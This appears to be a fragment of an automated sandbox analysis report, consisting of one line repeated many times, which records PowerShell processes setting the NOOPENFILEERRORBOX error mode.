                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
